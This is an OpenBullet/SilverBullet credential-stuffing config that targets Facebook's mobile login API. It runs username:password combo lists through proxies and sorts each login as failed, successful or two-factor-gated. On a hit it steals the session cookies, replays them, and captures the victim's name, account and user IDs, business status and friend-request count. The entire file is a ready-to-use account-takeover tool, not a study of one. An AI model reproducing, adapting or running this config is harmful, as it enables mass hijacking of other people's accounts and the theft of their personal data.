[SETTINGS]
{
  "Name": "Facebook",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-03-15T01:44:31.9359847+08:00",
  "AdditionalInfo": "Ricking#3224",
  "RequiredPlugins": [],
  "Author": "Ricking#3224",
  "Version": "1.1.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": ")(",
      "VariableName": "",
      "Id": 202597612
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://b-api.facebook.com/method/auth.login" 
  CONTENT "email=<USER>&password=<PASS>&credentials_type=password&error_detail_type=button_with_disabled&format=json&device_id=cdc4558c-4dd4-4fd0-9ba6-d09e0223d5e5&generate_session_cookies=1&generate_analytics_claim=1&generate_machine_id=1&method=auth.login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "authority: b-api.facebook.com" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "authorization: OAuth 200424423651082|2a9918c6bcd75b94cefcbb5635c6ad16" 
  HEADER "user-agent: Dalvik/2.1.0 (Linux; U; Android 9; Redmi 7 MIUI/V11.0.6.0.PFLMIXM) [FBAN/MessengerLite;FBAV/115.0.0.2.114;FBPN/com.facebook.mlite;FBLC/ar_EG;FBBV/257412622;FBCR/Orange - STAY SAFE;FBMF/Xiaomi;FBBD/xiaomi;FBDV/Redmi 7;FBSV/9;FBCA/arm64-v8a:null;FBDM/{density=2.0,width=720,height=1369};]" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password" 
    KEY "\":\"Invalid username or email address " 
  KEYCHAIN Success OR 
    KEY "session_key" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "User must verify" 

PARSE "<SOURCE>" LR "c_user\",\"value\":\"" "\"" -> VAR "CUS" 

PARSE "<SOURCE>" LR "fr\",\"value\":\"" "\"" -> VAR "FR" 

PARSE "<SOURCE>" LR "datr\",\"value\":\"" "\"" -> VAR "DTR" 

PARSE "<SOURCE>" LR "xs\",\"value\":\"" "\"" -> VAR "X" 

FUNCTION URLEncode "<X>" -> VAR "XS" 

REQUEST GET "https://m.facebook.com/?refsrc=https%3A%2F%2Fm.facebook.com%2F&_rdr" 
  
  HEADER "Host: m.facebook.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://m.facebook.com/login/save-device/?login_source=login" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: datr=<DTR>; fr=<FR>; sb=3lMpYKwYO6_QcWBti1wPKbjK; m_pixel_ratio=1; wd=1284x422; c_user=<CUS>; xs=<XS>" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "TE: Trailers" 

PARSE "<SOURCE>" LR "\",\"NAME\":\"" "\"" CreateEmpty=FALSE -> CAP "Full Name" 

PARSE "<SOURCE>" LR ",\"IS_BUSINESS_PERSON_ACCOUNT\":" "," CreateEmpty=FALSE -> CAP "Business Account" 

PARSE "<SOURCE>" LR "\"ACCOUNT_ID\":\"" "\"" CreateEmpty=FALSE -> CAP "Account ID" 

PARSE "<SOURCE>" LR "USER_ID\":\"" "\"" CreateEmpty=FALSE -> CAP "User ID" 

PARSE "<SOURCE>" LR "USER_ID\":\"" "\"" -> VAR "ID" 

REQUEST GET "https://m.facebook.com/friends/center/requests/?rfj=&refid=7&__m_async_page__=&__big_pipe_on__=&m_sess=&fb_dtsg_ag=AQyBp0gBpW3zAPbdJZCDPuBZ4WQdnjrFZ4nbuOkUkU8-nA:AQw_0q-l6qcSeWtdEMLmPGqaJwCJ3B3wQVZ9yVVHZR5c8A&jazoest=27877&__dyn=1KQEGiFodUoxu4U4ifGh0BBBgS5UqAxqcyoaU98nw_K361CwSwMxW0Horx64o72cwcW4o5a0AE1a852q3q5U2nweS787um78K1Jwt8-0mWeKdwlE6i0JE52229wcq0C9EdE2IzUuw9O1Aw9-2i1qw8W1uwbG&__csr=&__req=7&__a=AYnhxbIm3Pw1Z5Sx7fyj0_gVzDWoL9QR9eDFgNmon3kDY4hs1YEFgmzB-RvdePwfhGWfZRMy_A1yYjluiuUFILLHAZ_IyBYr1LH1ACh-MZkHqQ&__user=<ID>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Host: m.facebook.com" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://m.facebook.com/login/save-device/?login_source=login" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: datr=<DTR>; fr=<FR>; sb=3lMpYKwYO6_QcWBti1wPKbjK; m_pixel_ratio=1; wd=1284x422; c_user=<CUS>; xs=<XS>" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "TE: Trailers" 

PARSE "<SOURCE>" LR "updateRequestsBadge\\\",[],[" "]" CreateEmpty=FALSE -> CAP "Friend Requests" 

